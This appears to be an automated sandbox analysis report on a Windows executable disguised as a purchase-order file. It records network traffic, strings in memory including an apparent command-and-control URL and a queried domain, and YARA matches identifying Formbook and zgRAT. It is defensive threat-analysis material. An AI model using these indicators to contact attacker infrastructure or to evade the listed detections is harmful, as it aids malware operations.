        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Tue, 24 May 2022 22:37:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: -1 X-Dc: gcp-europe-west1 X-Request-ID: a061d98a-e085-4c73-9795-9345c31a5e9f X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7109842bdbbb995c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 24 May 2022 22:37:36 GMT Content-Type: text/html Content-Length: 291 ETag: "628d16df-123" Via: 1.1 google Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: Tengine Date: Tue, 24 May 2022 22:42:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 684 Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 24 May 2022 22:37:47 GMT Server: Apache Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Tue, 24 May 2022 22:38:08 GMT Content-Type: text/html Content-Length: 118 Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 24 May 2022 22:38:13 GMT Content-Type: text/html Content-Length: 291 ETag: "628d16df-123" Via: 1.1 google Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 24 May 2022 22:38:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked x-wix-request-id: 1653431899.1131753714030379 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3 X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcNxqRTGgIypykrF8CfWT6c,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRalrqyUxiBukN8lquytXnkXGlFXGwxNtUdqEtprkiYq/wojoe2GMQJ/MdiMK4Y/vI704TLHuFpCHeD62VpQP+vkYs=,2UNV7KOq4oGjA5+PKsX47GTyisN7iVCrYEwBeRKnkmpYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp6z7IyfxLR0DvGF38ZVfcXQ=,xTu8fpDe3EKPsMR1jrheEP5GNmd0+0JRnUZi7EYUt1s=,v8/9RyiPVS5W/0J6Pu/x94tgPhpxgFctFAnNxepA8jJamMqYX3qjq1DylQmfC+fQWIHlCalF7YnfvOr2cMPpyw== Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google x-wix-google-ccm: 1 Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 24 May 2022 22:38:40 GMT Content-Type: text/html Content-Length: 291 ETag: "628d16df-123" Via: 1.1 google Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 24 May 2022 22:39:15 GMT Content-Type: text/html Content-Length: 291 ETag: "628ae76f-123" Via: 1.1 google Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 24 May 2022 22:39:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.3 Cache-Control: public, max-age=60 Vary: Accept-Language CF-Cache-Status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HPDXdIHdokenxLMxz2VFLmdh9nf%2BM4wa%2BIgtGiClV%2BvwM1Y5la1fJpJEp2fk3qJJEKssQpRnjnwekmibRE95SVUBIIGNryQlyvtKnRS5JqYkd30CIvDHOhT0181XdbC4hLTdMuI2m8DEr0TzW3f09JIcbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 710986d7e95e7190-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 24 May 2022 22:39:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked x-wix-request-id: 1653431976.1321752645730597 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3 X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfwWumffprhrqhUts+0RXmk,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRals47NSbRY+saEB7SkBjxpWV3meP9HntDblqLPs3WzFUcjoe2GMQJ/MdiMK4Y/vI707NcHT9jnDzO/9kyZO6+ozE=,2UNV7KOq4oGjA5+PKsX47ARSt+S4p3KgmtdD48b3UGRYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp+SOLc04u3suljHr5fp0ZSE=,xTu8fpDe3EKPsMR1jrheENjxvIi4S/tdauezSCBwpuE=,v8/9RyiPVS5W/0J6Pu/x9wnOoFETI3p6H585CnGOVufbBGrfgbVxXPGwhsTMrP9n Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google x-wix-google-ccm: 1 Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Tue, 24 May 2022 22:39:51 GMT Content-Type: text/html Content-Length: 118 Connection: close
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com.40x
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comal1
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.combute
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comh
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comria
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coms-e
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comse
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comu
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comurs
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438214913.0000000006123000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438091336.0000000006123000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438151399.0000000006123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.433442083.000000000185B000.00000004.00000020.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comnt
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comslntF
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: rundll32.exe, 0000000A.00000002.953377602.0000000004C62000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.expoj3.com/j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfO
        Source: unknown; DNS traffic detected: queries for: www.deta-hedman.com

        E-Banking Fraud


        System Summary

        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.44452d0.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.7b10000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.44452d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.7b10000.11.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.469891421.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
        Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: PO-INQUIRY-VALE-SP-2022-60.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.44452d0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.7b10000.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.44452d0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.7b10000.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
